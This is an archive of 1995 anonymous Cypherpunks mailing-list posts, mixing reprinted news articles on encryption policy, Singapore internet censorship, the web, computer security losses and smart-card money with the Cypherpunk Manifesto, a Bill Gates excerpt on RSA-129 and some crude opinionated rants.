   Reference Privacy Update [Statement by Mr. Robert Gellman omitted]
During discussion time, Board members voted on and unanimously
approved the minutes of the March, 1995 meeting.
The Board engaged in a lengthy discussion concerning PDD-29
and the intent of the charter of the SPB.  Board members
debated the idea of a single policy focal point.  They also
debated the phrase in PDD-29 "National Security."  One Board
member reminded the Board of a Government Computer News
article that PDD-29 appears to be clouded as to whether the
PDD intended to include sensitive unclassified information in
addition to national security (i.e., classified/Warner
Amendment) information.  A motion was moved and seconded
directing the chairman to draft a letter to the Co-Chairs of
the SPB and the SPF, articulating the need for clarification
of PDD-29 and the SPB charter.  (ACTION-CHAIRMAN AND
PKI Steering Committee Activities
Mr. Robert Rosenthal, Manager, NIST Protocol Security Group,
briefed the Board on the activities of the Public Key
Infrastructure (PKI) Steering Committee.  Three working groups
reside under the Committee: technical (chaired by IRS),
business and legal (chaired by Treasury), and users (chaired
by the SI-PMO).  The Steering Committee continues to liaise
with the Canadian and Swedish governments, the Internet
community, the American Bankers and American Bar Associations
and the U. S. Council for International Business.  The
Steering Committee is exploring the establishment of a
Cooperative Research and Development Agreement (CRDA) with
industry organizations to:
-  Research and Develop a PKI Interoperability Test Plan and
   a NIST PKI Test Facility;
-  Publish test procedures and lessons learned; and
-  Develop and Demonstrate Interoperable Certificate Services
   on a wide variety of Internetworked Communications
   Facilities.
Mr. Rosenthal said there are workshops and special projects
slated for the future to include a tri-sponsored PKI
Invitational Workshop Series by NIST, the Security
Infrastructure Program Management Office and MITRE.  Also
planned, are some interdivision projects such as: PKI, time
and attendance, travel, procurement, and others that will be
available on the "NISTNET." NISTNET is a campus-wide local
area network for NIST.  (See Reference DISA/ARPA/NSA Memorandum Of Understanding Briefing
Mr. John Davis, Director, NSA's National Computer Security
Center, briefed the Board on the Memorandum Of Understanding
(MOU) between the Defense Information Systems Agency (DISA),
the Advanced Research Projects Agency (ARPA), and the National
Security Agency (NSA).  He said that ARPA and NSA are the
major INFOSEC research programs in government and the major
user of INFOSEC is DISA.  The Information Systems Security
Research Joint Technology Office was established by a
Memorandum Of Agreement (MOA) in March of 1995 and signed by
the Directors of ARPA/DISA/NSA to coordinate security research
efforts with a heavy reliance upon commercial technology.  The
following nine items were called out in the agreement: 1)
Strategic Planning, 2) Review and Coordinate, 3) Evaluate
Proposals, 4) Metrics, 5) Prototypes, 6) COTS, 7) Standards,
8) Crypto and 9) Public.  Mr. Davis said this is work in
progress and they are looking for useful results.  Vendors
will show their products at the NIST/NCSC National Information
Systems Security Conference (NISSC) in Baltimore in
October.  Mr. Davis stated that the intent is not to focus
only on DoD.  A Defense solution would be costly, therefore,
commercial products with built in security are needed.  (See
Reference Public Comment [Omitted]

@_date: 1995-11-09 08:38:43
@_author: Anonymous 
@_subject: Cybercensor in Singapore 
NY Times, November 8, 1995, Editorial
Cyberspace in Singapore. The Internet Threat to Official
"The Internet is like fire," Mr. Yeo said. "If you don't learn how to control it, it will burn you." In Singapore, a little democracy can be a dangerous thing.
Singapore. From his 37th-floor office overlooking
Singapore Strait, George Yeo can survey the oil
refineries and bustling dockyards that helped make
Singapore the trade and financial center of Southeast
Asia. But the view that interests the Minister of
Information and the Arts these days is not the vista
beyond his window. It is the image on the computer
terminal at his desk. Mr. Yeo, like the rest of
Singapore's top politicians, wants his country to be a
leader in the manufacture and use of computer technology
without relinquishing the Government's chokehold on the
dissemination of information in Singapore.
Singapore's effort to find a balance point will be
closely watched by other Asian countries that mix
capitalist economics with authoritarian politics. The
difficulty was underlined last week. Even as Mr. Yeo
worried about the perils of the Internet, the Government
announced it was relocating 500 industrial enterprises to
make room for the development of advanced electronics
manufacturing plants.
Contradictions like that abound in Singapore, a country
that eludes simple classification. With its gleaming
skyscrapers and shopping arcades, it can seem like Dallas
transplanted to the South China Sea. Conversely, the
dominance of one political party and the presence of a
paternalistic Government can make it feel like a remnant
of the Soviet bloc. Salman Rushdie's "Satanic Verses" and
Cosmopolitan magazine are banned, yet the city's largest
bookstore stocks a selection of contemporary literature
and the works of Chee Soon Juan, Singapore's opposition
Singapore's gaudy prosperity challenges the American
faith that individual liberty is essential for a vital
marketplace. George Yeo is the personification of that
challenge. Born in Singapore in 1954, educated at
Cambridge University and Harvard Business School, he is
disdainful of the cacophony and untidiness of American
democracy. Like Lee Kuan Yew, the architect and ruler of
modern Singapore, he believes the vulnerabilities of his
ethnically divcrse city-state can be best handled by a
strong government that encourages a sense of community
and limits individual rights.
But controlling semiconductors is not the same as
controlling newspapers, television networks or political
opponents. With the aggressive use of libel and slander
statutes Singapore's leaders have intimidated the
newspapers that publish here, including The International
Herald Tribune. To control television broadcasting, the
Government has banned household use of satellite dishes.
Some political pluralism is permitted, but no one doubts
the primacy of Mr. Lee's People's Action Party.
Recognizing the risk of bottling up public demand for
foreign television broadcasts, Singapore's leaders are
wiring the country for cable television. That way viewers
will receive many more channels, including MTV, while the
Government will still be able to screen out programming
it finds objectionable. It is the quintessential
Singapore solution.
Singapore's approach to controlling cyberspace is equally
ingenious, but harder to enforce. Mr. Yeo, essentially,
hopes to control the Internet by embracing it. He is
encouraging use of the Internet by equipping schools with
computers, and establishing systems that allow
Singaporeans to link up with the computer network by
dialing a local phone number.
The catch is that the Government will be able to monitor
use of the Internet that goes through local servers, and
is already intervening to block material it considers
pornographic. The Government has blunted an uncensored
Internet forum on Singapore political life by assembling
a group of users who make sure the Government's views are
Mr. Yeo concedes that more sophisticated and affluent
users can outflank many of his defenses by dialing into
the Internet through foreign phone systems. His purpose,
he says, is to lay down markers for citizens, expecting
that most will abide by them. "The Internet is like
fire," he said. "If you don't learn how to control it, it
will burn you." In Singapore, a little democracy can be
a dangerous thing.
Philip Taubman

@_date: 1995-11-11 06:46:33
@_author: Anonymous 
@_subject: "Industry Group Rebuffs U.S. on Encryption" 
Giving up on what? On doing everything within its power to keep the world
beyond itself strong-cypto-free? Not likely.
In only a few decades, crypto's gone from being unheard of to the object
of an increasingly high-profile PR war over "domestic and international
terrorists and criminals." The govt's position, however, hasn't changed
substantially: it doesn't like crypto, and it never will. There will never
be a time when the cops who pull you over or drop by for a visit will say,
"Ma'am, if you've encrypted that, we respect the fact that you don't want
anyone to see that--so we'll just be going bow. You have a nice day, now,
y'hear." And there will never be no cops.
The gov't may well lose this fight eventually, but a few heads are gonna
get broken before either side wins. This fight is playing itself out on
the level of policy now, but it's much bigger than a policy issue. And the
"revolution" of Newt and his legions of weenies (I say nothing of Clinton
and his legions of weenies) is bullshit: he's an empty opportunist who's
riding a fractious coalition that'll make Clinton look like a libertarian
if it ever gets control of the country. And right now he's cluing in to
the fact that he can score some points on encryption issues: he's got his
eye on the snowballing WiReD coalition, which *no one* knew existed until
a few years ago.

@_date: 1995-11-13 14:27:39
@_author: Anonymous 
@_subject: Gingrich, "crypto coalition" [*PURE* NOISE] 
I see  the flames of a bunch of brats with a lot of disposable
income, and  a sysop culture armed with buckets of water they'd rather
not use lest it short out their technocratic "ethics."
      Point-and-click organizing and killfile absorption of discourse. Harrumph.
      In GROUP politics. Libertarianism is recursively structured: "when
there's no gubmint" -- I ain't holding my breath -- they won't trust
      To paraquote one of my favorite lesbians, a meme is a meme is a meme
is a meme is a meme. The idea that memes will change the world is very
typical of our era, which is to say very naive. Warren works, TCM plays;
Warren works, and TCM -- who, it's abundantly clear, is brilliant in his
own way -- gambles: gambles that the memes he's "trademarked" might pan
      Not really: libbies would rather play a low-stakes game with their
own back yard than a high-stakes game with society, in which everyone is
in each others' back yard.
      Yes.       Trashed *as a tentacle*.
      Crypto as a litmus test isn't interesting: crypto is a means to an
end. What is that end? For too many, it is "antigovernment" -- that is,
      Perry has grime under his fingernails. Perry works, works with other
people toward definable ends: Perry is, among other things, a craftsman.
And if I'm not mistaken, he lives in a place where he gets to see how many
people live, and how they live together; this is very different from
*choosing to* live where and how TCM does. (Is this a "scurrilous attack,"
in TCM's words? Or is it just the expression of an opinion? Dr. Fred may
be an oaf, but the *reaction* to him demonstrates just how stupid it is to
say anything that doesn't toe the line on *this* list, despite all the
I-and-thou mumbojumbo.)
      "Replacing" is a participle: what is the agent? If the agent is an
individual, or an alienated mass of individuals, it will not be able to
replace the govt; if, OTOH, it's a mass of ORGANIZED individuals, it is no
longer libertarian.
      This is crypto-anarchy, with "crypto-" meaning what it does to most
of the pople who use it: X passing as Y, a crypto-fascist for example. And
"infiltrate" is nothing more than a fancy word for working within the
system, namely, reformism.
      Yes: this hostility to organization is an old thread in American
culture. Its usually associated with antiurbanism, anticosmopolitanism,
things like that, but most libbies I've ever met (which is a lot) are
mnore anti-control than pro-freedom. You do the math.
      Cynical? How about naive?
it from
      If you haven't seen any proof that it can't be reformed, then you
haven't looked at the piechart on the back of the 1040 booklet.
      "Encryption is a right" reveals that crypto-libbies are honkey-man
analogs of PC creeps: everything is a right.
      Yes.
      Yes.
      Don't bother putting anything on. He's a tool, a chump to his own
megalomania: I'd love to see that pussy get elected. The moment someone
sneezed, he'd set up a howl louder than a cat with a firecracker up its
butt. He's just as snively as anyone else these days.

@_date: 1995-11-13 16:33:42
@_author: Anonymous 
@_subject: Love Bugs 
The Nov 11 WSJ reports on the scare tactics of security
consultants in the U.S. and by their co-conspiring
counterparts -- spies -- abroad:
Richard Heffernan, an information-security specialist for
30 years, said his clients sometimes return to their
hotel rooms to find their belongings ransacked,
especially in Europe. Some European companies will pay as
much as $10,000 for the laptop of a Fortune 500
executive, he adds.
Watch out for tiny surveillance tools. In 1992, the
Canadian government reportedly warned businessmen that
the French intelligence service was bugging airline seats
and using undercover agents as flight attendants.
Penlight cameras placed above airline seats can make
readable photos of laptop screens.
Spies on planes can overhear conversations from several
seats away. Look for them in business suits with plenty
of luggage, says security consultant Kevin Coffey. "These
guys fit in."
Another consultant estimates that 45% of bugs are on fax
machines, and one group of U.S. executives inadverdently
gave their secrets to the competition by using the fax
machine at Moscow's upscale Metropol Hotel, which is
staffed with former FBI and KGB operatives.
If you are carrying extremely sensitive information, be
especially paranoid.
All this may be too much for some companies, who say they
don't have time to evade possible spies. Rather than take
the trouble, some companies end up postponing business
plans aborad, saying, "Forget it. We'll come back in a
few years."
That's what they said at the office, now listen to the bug
up Gigi's.

@_date: 1995-11-14 05:33:18
@_author: Anonymous 
@_subject: POTP Security 
We ordered POTP based on the initial blurbs by Kahn and
   others. It took a while to get it, we talked to Elementrix
   HQ and got voicemail, stutters and recordings saying be
   patient. We read c'punks' slash and burns in the waiting
   period. When the boxes appeared, we read the extra-thin
   documents -- mostly PR gush -- reflected, decided to leave
   the red white and blue boxes At No Time Padded.
   Later a POTP distributer's rep called to ask how we like
   the product. We said, haven't tried it, because we learned
   a bit from reading cryptography lists. We wondered if he
   knew what was being said.
   He said, yes, we know, but they're all wrong, it's a
   fabulous product, totally secure.
   How you gonna prove it, we asked, to consumers like us who
   don't know who to believe? You know, we're reading more
   these days about hacks of cryptography and we want to know
   more than press releases. The people you're citing for
   endorsement aren't cryptographers.
   Yes, he said, that's what we're hearing, that's why I'm
   calling you, we looking for users to endorse the program
   while we're waiting for patent approvals, and trying to get
   the crypto authorities to sign NDA's.
   Sorry, we said, we're can't take a chance on your product.
   Call us back after you get the crypto fuck-authorities to
   hack at it in public.

@_date: 1995-11-14 07:19:47
@_author: Anonymous 
@_subject: what's going on 
Privacy is necessary for an open society in the electronic age.
Privacy is not secrecy.  A private matter is something one doesn't
want the whole world to know, but a secret matter is something one
doesn't want anybody to know. Privacy is the power to selectively
reveal oneself to the world.  If two parties have some sort of dealings, then each has a memory of
their interaction.  Each party can speak about their own memory of
this; how could anyone prevent it?  One could pass laws against it,
but the freedom of speech, even more than privacy, is fundamental to
an open society; we seek not to restrict any speech at all.  If many
parties speak together in the same forum, each can speak to all the
others and aggregate together knowledge about individuals and other
parties.  The power of electronic communications has enabled such
group speech, and it will not go away merely because we might want it
Since we desire privacy, we must ensure that each party to a
transaction have knowledge only of that which is directly necessary
for that transaction.  Since any information can be spoken of, we
must ensure that we reveal as little as possible.  In most cases
personal identity is not salient. When I purchase a magazine at a
store and hand cash to the clerk, there is no need to know who I am. When I ask my electronic mail provider to send and receive messages,
my provider need not know to whom I am speaking or what I am saying
or what others are saying to me;  my provider only need know how to
get the message there and how much I owe them in fees.  When my
identity is revealed by the underlying mechanism of the transaction,
I have no privacy.  I cannot here selectively reveal myself; I must
_always_ reveal myself.
Therefore, privacy in an open society requires anonymous transaction
systems.  Until now, cash has been the primary such system.  An
anonymous transaction system is not a secret transaction system.  An
anonymous system empowers individuals to reveal their identity when
desired and only when desired; this is the essence of privacy.
Privacy in an open society also requires cryptography.  If I say
something, I want it heard only by those for whom I intend it.  If the content of my speech is available to the world, I have no
privacy.  To encrypt is to indicate the desire for privacy, and to
encrypt with weak cryptography is to indicate not too much desire for
privacy.  Furthermore, to reveal one's identity with assurance when
the default is anonymity requires the cryptographic signature.
We cannot expect governments, corporations, or other large, faceless
organizations to grant us privacy out of their beneficence.  It is to
their advantage to speak of us, and  we should expect that they will
speak.  To try to prevent their speech is to fight against the
realities of information. Information does not just want to be free,
it longs to be free.  Information expands to fill the available
storage space.  Information is Rumor's younger, stronger cousin;
Information is fleeter of foot, has more eyes, knows more, and
understands less than Rumor.
We must defend our own privacy if we expect to have any.  We must
come together and create systems which allow anonymous transactions
to take place.  People have been defending their own privacy for
centuries with whispers, darkness, envelopes, closed doors, secret
handshakes, and couriers.  The technologies of the past did not allow
for strong privacy, but electronic technologies do.
We the Cypherpunks are dedicated to building anonymous systems.  We
are defending our privacy with cryptography, with anonymous mail
forwarding systems, with digital signatures, and with electronic
Cypherpunks write code.  We know that someone has to write software
to defend privacy, and since we can't get privacy unless we all do,
we're going to write it. We publish our code so that our fellow
Cypherpunks may practice and play with it. Our code is free for all
to use, worldwide.  We don't much care if you don't approve of the
software we write.  We know that software can't be destroyed and that
a widely dispersed system can't be shut down. Cypherpunks deplore regulations on cryptography, for encryption is
fundamentally a private act.  The act of encryption, in fact, removes
information from the public realm.  Even laws against cryptography
reach only so far as a nation's border and the arm of its violence.
Cryptography will ineluctably spread over the whole globe, and with
it the anonymous transactions systems that it makes possible. For privacy to be widespread it must be part of a social contract.
People must come and together deploy these systems for the common
good.  Privacy only extends so far as the cooperation of one's
fellows in society.  We the Cypherpunks seek your questions and your
concerns and hope we may engage you so that we do not deceive
ourselves.  We will not, however, be moved out of our course because
some may disagree with our goals.
The Cypherpunks are actively engaged in making the networks safer for
privacy.  Let us proceed together apace.

@_date: 1995-11-17 05:44:20
@_author: Anonymous 
@_subject: Evil Mail 
WSJ, November 15, 1995
America Online to Warn Users About Bad E-Mail
Vienna, Va. -- It's a case of myth becoming reality in
the digital age.
America Online Inc. plans to warn subscribers of a
damaging piece of electronic mail that could corrupt
their computers' hard drives.
The existence of the destructive file follows a long-term
hoax that has been dogging AOL for months. Last year, a
user began circulating a warning about a "Good Times"
virus that would crash users' PCs if they so much as read
the piece of electronic mail. AOL, the Federal
Communications Commission and the Pentagon repeatedly had
to label the alleged virus a hoax.
But the new file is all too real. The destructive file,
attached to electronic mail, has been circulated through
the on-line service and the Internet. Receiving the
e-mail wouldn't harm a user's computer, but trying to run
the attached file, known as AOL Gold or "install.exe,"
could render a hard drive inoperable, an AOL spokeswoman
The company said it has notified various
computer-security agencies about the program. AOL also
plans to post a letter for its four million users
strongly urging them to forgo "downloading attached files
from people you don't know."
Security experts fear that such Trojan Horses will
proliferate as programs become easier to attach to
electronic mail and the use of networks grows.

@_date: 1995-11-20 12:56:15
@_author: Anonymous 
@_subject: Ponzi Web 
NY Times, 11-20-95, front page.
If Medium Is the Message, the Message Is the Web
By John Markoff
San Francisco, Nov. 19 -- The Associated Press was formed in
the mid-19th century when a group of newspapers decided to
invest jointly in a newfangled medium -- the telegraph -- to
speed the collection and dissemination of information.
Last week, A.P. announced that it would adopt a newer-fangled
medium -- the World Wide Web -- to begin distributing its
articles and photographs over the global Internet. It was
simply the latest, but perhaps most historically significant,
move yet by an old-line media organization into the World Wide
Web, the Internet multimedia information-retrieval system that
appears on the verge of becoming a mass medium itself.
If the medium is the message, then the message these days is
the World Wide Web.
In short order the Web, which three years ago was little more
than a research tool for physicists and computer hobbyists,
has flourished. It is being embraced by media concerns,
consumer-product companies and businesses of various stripes
that are creating thousands of so-called Web sites each month,
with the number of computers playing host to one or more of
these sites already exceeding 100,000.
Conservative estimates place the number of people who have
used the Web in the millions, and it is not hard to find more
breathless estimates in the tens of millions.
Capable of letting people use computers to send and receive
text, sound, still images and video clips, the Web
incorporates elements of the various print and electronic
media that have preceded it. And yet, the Web is poised not to
replace its predecessors but to take a place alongside them as
a social, cultural and economic force in its own right.
Its complementary role is already evident: many radio stations
and all the major television networks have Web sites promoting
their programs and stars. Newspapers, including The New York
Times, are devising cyberspace editions.
And few movies anymore are released without a promotional Web
site, including "Goldeneye" the James Bond film that opened
this weekend at theaters everywhere and on the Web at the
address  The site offers the movie's
theme song performed by Tina Turner, more than a dozen video
clips from the film and illustrated biographies of the cast
Prime-time television commercials by Toyota and other
advertisers now routinely include a Web address. And Procter
& Gamble, whose advertising has long helped underwrite the
mass media, has even staked out prime Web real estate by
reserving addresses that include flu.com and toiletpaper.com.
"We are poised on the edge of a new medium," Clay Felker,
director of the magazine program at the University of
California at Berkeley's graduate journalism school, said.
"It's going to change the nature of how we acquire
As with each mass medium that has arrived before it, the Web
has reached this threshold through a confluence of a key
technology, a ready audience and a stream of corporate backers
willing to bet that profitable businesses can be built on it.
But few experts are willing to declare that the Web has taken
its place in the mass media pantheon because the profitable
business formulas have yet to be found.
Newspapers and magazines make money by selling individual
copies, subscriptions and advertising space. Radio and
television stations sell air time to those with money and a
message. Movie theaters sell tickets. But on the Web so far,
despite seed-money by adventurous advertisers and some
tentative efforts to charge for access to sites or services,
there is no certainty that this medium will achieve the
critical mass that capitalism demands of its mass media.
"How do you make a business out of the World Wide Web?" asked
Norman Pearlstine, editor in chief of Time Inc., which has an
experimental Web site called Pathfinder that offers selected
contents from the company's magazines
( But because ad revenue alone is
not carrying the freight, Time Inc. will begin testing ways to
charge visitors to its site.
And yet, the technological prerequisites are firmly in place.
The Web is an outgrowth of the Internet, which began as an
academic research experiment in the late 1960's. For more than
two decades the Internet remained largely inaccessible, used
mainly by computer scientists and Pentagon researchers,
university scholars and students.
Then came the World Wide Web.
Like the Internet, the Web began as a tool to let scientists
easily and quickly share information. Conceived in the late
1980's by Tim Berners-Lee, who was then a software designer at
CERN, the Swiss physics research center, the basic Web
technology was first put to use in 1990.
The big breakthrough came in 1992, when student researchers at
the National Center for Supercomputing Applications in
Illinois created Mosaic, a simple software tool called a Web
browser. Mosaic permitted access to information anywhere on
tke World Wide Web by letting the user point and click a
computer mouse on highlighted words or images on the screen.
The browser, which became available in commercial versions
like Netscape Communications' Navigator, not only made Web
sites easily accessible, it prompted businesses, organizations
and even individuals to create new Web sites by the thousands.
Thus did the Web quickly become a standard and accepted way
for the growing millions of the computer-literate to
communicate and to entertain and inform themselves. And unlike
each previous mass medium, the Web does not require its
audience to be merely passive recipients of information.
For very little money, and with a modicum of computer skills,
virtually anyone can create his or her own Web site. Anyone
with a modem is potentially a global pamphleteer.
One consequence of this democratization is that the Web can be
a remarkably anarchic forum compared with the old-style mass
media. "Think of this as television colliding with the
telephone party line," said Paul Saffo, a computer industry
consultant at the Institute for the Future, a Menlo Park,
Calif., research firm. "In terms of social consequences, the
Web is a great experiment. It's going to deliver us community
with a vengeance -- and we may find we don't want it."
NYT, 11-20-95, Business Section.
Losses From Computer Breaches Are on the Rise, a Study Finds
By Peter H. Lewis
Financial losses from computer break-ins and other security
breaches are on the rise, according to a survey of corporate
computer-security managers, with nearly half of all companies
reporting losses as a result of hackers, viruses, sabotage,
corporate spies and incompetent employees.
At least 20 of the 1,290 companies responding to the annual
security survey from Information Week magazine and the
consulting firm Ernst & Young, reported losses of more than $1
million last year.
But the poll also found that companies were more aware of the
risks arising from growing reliance on computer networks, and
were taking stronger steps to protect their information
"There is definitely increased awareness on the part of senior
management," said Daniel White, national director of
information security at Ernst & Young's Chicago office. But
Mr. White said that despite increased vigilance by computer
security officers, the lack of security tools made it risky to
conduct electronic-document interchange and other sensitive
business operations on the Internet.
"Lots of organizations are using the Internet in a thoughtful
way for marketing and information dissemination," Mr. White
said. "But do I really want to use it" for an
electronic-document transaction? "Not yet."
Details of the survey, the third annual one, are in the Nov.
28 issue of Information Week, available this week.
Among other findings were that nearly 80 percent of companies
surveyed had at least one full-time information-security
officer, a slight increase from last year. Of those, 45
percent report directly to the corporation's chief information
officer, reflecting the growing recognition of the importance
of computer security, Mr. White said.
Nearly 70 percent of those responding said their companies had
sustained a serious virus attack in the last year, a sharp
rise from 54 percent two years ago.

@_date: 1995-11-22 01:53:58
@_author: Anonymous 
@_subject: "Junk E-Mail" 
And for successfully encouraging the murder of doctors.       Who were systematically arrested, beaten, teargassed, wiretapped,
and even occasionally shot at. I *know*--I got firehosed, beaten,
arrested, and wiretapped for what I did. That's why I'm a Cypherpunk now.
      OR has received far better treatment than the civil rights
protesters ever did--or did I miss the news items reporting that Terry
Randall and Ralph Reed had been assassinated, and that their lieutenants
had been bumped off in black-bag jobs, and that their colleagues were
chained down to chairs *in court*?
      Do you usually send nursery rhymes to mailing lists?

@_date: 1995-11-25 23:15:25
@_author: Anonymous 
@_subject: Gates: Jiffy Iffy Crypto 
Myhrvold and Peter Rinearson, Viking, 1995.
[Paths to the Highway, pp. 106-111]
Governments have long understood the importance of
keeping information private, for both economic and
military reasons. The need to make personal, commercial,
military, or diplomatic messages secure (or to break into
them) has attracted powerful intellects through the
generations. It is very satisfying to break an encoded
message. Charles Babbage, who made dramatic advances in
"Deciphering is, in my opinion, one of the most
fascinating of arts, and I fear I have wasted upon it
more time than it deserves." I discovered its fascination
as a kid when, like kids everywhere, a bunch of us played
with simple ciphers. We would encode messages by
substituting one letter of the alphabet for another. If
a friend sent me a cipher that began "ULFW NZXX," it
would be fairly easy to guess that this represented "DEAR
BILL," and that U stood for D, and L for E, and so forth.
With those seven letters it wasn't hard to unravel the
rest of the cipher fairly quickly.
Past wars have been won or lost because the most powerful
governments on earth didn't have the cryptological power
any interested junior high school student with a personal
computer can harness today. Soon any child old enough to
use a computer will be able to transmit encoded messages
that no government on earth will find easy to decipher.
This is one of the profound implications of the spread of
fantastic computing power.
When you send a message across the information highway it
will be "signed" by your computer or other information
appliance with a digital signature that only you are
capable of applying, and it will be encrypted so that
only the intended recipient will be able to decipher it.
You'll send a message, which could be information of any
kind, including voice, video, or digital money. The
recipient will be able to be almost positive that the
message is really from you, that it was sent at exactly
the indicated time, that it has not been tampered with in
the slightest, and that others cannot decipher it.
The mechanism that will make this possible is based on
mathematical principles, including what are called
"one-way functions" and "public-key encryption." These
are quite advanced concepts, so I'm only going to touch
on them. Keep in mind that regardless of how complicated
the system is technically, it will be extremely easy for
you to use. You'll just tell your information appliance
what you want it to do and it will seem to happen
A one-way function is something that is much easier to do
than undo. Breaking a pane of glass is a one-way
function, but not one useful for encoding. The sort of
one-way function required for cryptography is one that is
easy to undo if you know an extra piece of information
and very diffficult to undo without that information.
There are a number of such one-way functions in
mathematics. One involves prime numbers. Kids learn about
prime numbers in school. A prime number cannot be divided
evenly by any number except 1 and itself. Among the first
dozen numbers, the primes are 2, 3, 5, 7, and 11. The
numbers 4, 6, 8, and 10 are not prime because 2 divides
into each of them evenly. The number 9 is not prime
because 3 divides into it evenly. There are an infinite
number of prime numbers, and there is no known pattern to
them except that they are prime. When you multiply two
prime numbers together, you get a number that can be
divided evenly only by those same two primes. For
example, only 5 and 7 can be divided evenly into 35.
Finding the primes is called "factoring" the number.
It is easy to multiply the prime numbers 11,927 and
20,903 and get the number 249,310,081, but it is much
harder to recover from the product, 249,310,081, the two
prime numbers that are its factors. This one-way
function, the difficulty of factoring numbers, underlies
an ingenious kind of cipher: the most sophisticated
encryption system in use today. It takes a long time for
even the largest computers to factor a really large
product back into its constituent primes. A coding system
based on factoring uses two different decoding keys, one
to encipher a message and a different but related one to
decipher. With only the enciphering key, it's easy to
encode a message, but deciphering it within any practical
period of time is nearly impossible. Deciphering requires
a separate key, available only to the intended recipient
of the message -- or, rather, to the recipient's
computer. The enciphering key is based on the product of
two huge prime numbers, whereas the deciphering key is
based on the primes themselves. A computer can generate
a new pair of unique keys in a flash, because it is easy
for a computer to generate two large prime numbers and
multiply them together. The enciphering key thus created
can be made public without appreciable risk, because of
the difficulty even another computer would have factoring
it to obtain the deciphering key.
The practical application of this encryption will be at
the center of the information highway's security system.
The world will become quite reliant on this network, so
it is important that security be handled competently. You
can think of the information highway as a postal network
where everyone has a mailbox that is impervious to
tampering and has an unbreakable lock. Each mailbox has
a slot that lets anyone slide information in, but only
the owner of a mailbox has the key to get information
out. (Some governments may insist that each mailbox have
a second door with a separate key that the government
keeps, but we'll ignore that political consideration for
now and concentrate on the security that software will
Each user's computer or other information appliance will
use prime numbers to generate an enciphering key, which
will be listed publicly, and a corresponding deciphering
key, which only the user will know. This is how it will
work in practice: I have information I want to send you.
My information appliance/computer system looks up your
public key and uses it to encrypt the information before
sending it. No one can read the message, even though your
key is public knowledge, because your public key does not
contain the information needed for decryption. You
receive the message and your computer decrypts it with a
private key that corresponds to your public key.
You want to answer. Your computer looks up my public key
and uses it to encrypt your reply. No one else can read
the message, even though it was encrypted with a key that
is totally public. Only I can read it because only I have
the private deciphering key. This is very practical,
because no one has to trade keys in advance.
How big do the prime numbers and their products have to
be to ensure an effective one-way function?
The concept of public-key encryption was invented by
Whitfield Diffie and Martin Hellman in 1977. Another set
of computer scientists, Ron Rivest, Adi Shamir, and
Leonard Adelman, soon came up with the notion of using
prime factorization as part of what is now known as the
RSA cryptosystem, after the initials of their last names.
They projected that it would take millions of years to
factor a 130-digit number that was the product of two
primes, regardless of how much computing power was
brought to bear. To prove the point, they challenged the
world to find the two factors in this 129-digit number,
known to people in the field as RSA 129:
   114,381,625,757,888,867,669,235,779,976,146,612,010,
   218,296,721,242,362,562,561,842,935,706,935,245,733,
   897,830,597,123,563,958,705,058,989,075,147,599,290,
   026,879,543,541
They were sure that a message they had encrypted using
the number as the public key would be totally secure
forever. But they hadn't anticipated either the full
effects of Moore's Law, as discussed in chapter 2, which
has made computers much more powerful, or the success of
the personal computer, which has dramatically increased
the number of computers and computer users in the world.
In 1993 a group of more than 600 academics and hobbyists
from around the world began an assault on the 129-digit
number, using the Internet to coordinate the work of
various computers. In less than a year they factored the
number into two primes, one 64 digits long and the other
65. The primes are as follows:
   3,490,529,510,847,650,949,147,849,619,903,898,133,
   417,764,638,493,387,843,990,820,577
   32,769,132,993,266,709,549,961,988,190,834,461,413,
   177,642,967,992,942,539,798,288,533
And the encoded message says: "The magic words are
squeamish and ossifrage."
One lesson that came out of this challenge is that a
129-digit public key is not long enough if the
information being encrypted is really important and
sensitive. Another is that no one should get too cocksure
about the security of encryption.
Increasing the key just a few digits makes it much more
difficult to crack. Mathematicians today believe that a
250-digit-long product of two primes would take millions
of years to factor with any foreseeable amount of future
computing power. But who really knows? This uncertainty

@_date: 1995-11-26 00:07:09
@_author: Anonymous 
@_subject: Money: Back to the Future? 
Wall Street Journal, Nov 23, 1995.
Money: Back to the Future?
By Walter Wriston (Former chairman of Citicorp)
Americans are about to begin using a new kind of money
that may have consequences for the Federal Reserve's
control of the money supply and almost certainly for the
velocity of money.
Over the years, people have used all kinds of things for
money, from the huge immovable stones in the front yards
of the residents of Yap Island to the more familiar
silver and gold. All these various mediums of exchange
will now be joined in our country by the "smart" card --
a piece of plastic embedded with a microchip.
Smart cards combine features of the following: automatic
teller machine cards that let you access your bank
account and draw cash; MasterCard or Visa cards that
permit you to buy now and pay later; and debit cards that
charge an account at the time of purchase. Not only can
smart cards do all of the above but they can also serve
as an "electronic purse" independent of your bank
account. These cards contain real money that can be spent
at stores and restaurants. In effect, the card is an
electronic traveler's check, but one that makes exact
change. In addition, the integrated circuit chip allows
a higher degree of security for the information stored
than do the current magnetic strip cards.
Smart cards are common in Europe and Asia, where some 400
million were shipped last year. The first large-scale use
of smart cards in this country will occur next year at
the Summer Olympics in Atlanta. Plans call for 300,000
rechargeable cards, and 700,000 disposable cards in
denominations of $25, $50 and $100. These cards would fit
nicely into the payment habits of Americans, since in the
U.S. it is estimated that 88% of transactions are done by
cash or check, and of these 83% are for less than $10. In
Atlanta, electronic "purse cards," which contain stored
value, could be spent at pay phones or vending machines.
When their stored value is exhausted, they are thrown
away. The smart cards, by contrast, can be taken back to
the issuer and recharged.
Their broad issuance and use could return America to
something very close to the free banking of the last
century, when every commercial bank issued dollar bills,
backed sometimes by the skill of the management,
sometimes by doubtful state bonds and sometimes by gold
or silver.
We have grown so accustomed to the familiar Federal
Reserve note that many forget that Americans had no
central bank for about 75 years -- from 1836, when
President Jackson vetoed the bill to renew the charter of
the Second Bank of the United States, to the start of
World War I, when the Federal Reserve Act was passed.
After the passage by New York state of the Free Banking
Act in 1838, the idea of state-chartered banks spread
across the country, and each commercial bank issued its
own dollar bills of various shapes and sizes.
This does not mean that the 19th century witnessed
complete currency chaos. In 1863, the National Bank Act
was passed to create a market in the government bonds
needed to finance the Civil War and to bring some order
to the private issuance of currency. The act required
that bank notes issued by commercial banks be uniform in
appearance and that they be backed by collateral
consisting of U.S. Treasury securities. As the old Civil
War bonds were paid off, the currency base of the country
declined some 60% from 1881 to 1890. This inflexible
system led to panics and instability.
To a certain extent, the Treasury Department during this
time assumed some of the functions of a central bank. All
during this period a debate raged, not about whether
America needed a central bank but about "free silver" and
the price at which the Treasury would buy gold and
silver. It was not until the eve of World War I that
passage of the Federal Reserve Act finally gave the U.S.
government a monopoly on the creation of money.
Now we may be going back to the future. The advent of
smart cards means that the Fed will lose its monopoly on
issuing currency, except that this time the new money
will be issued not only by banks but by all kinds of
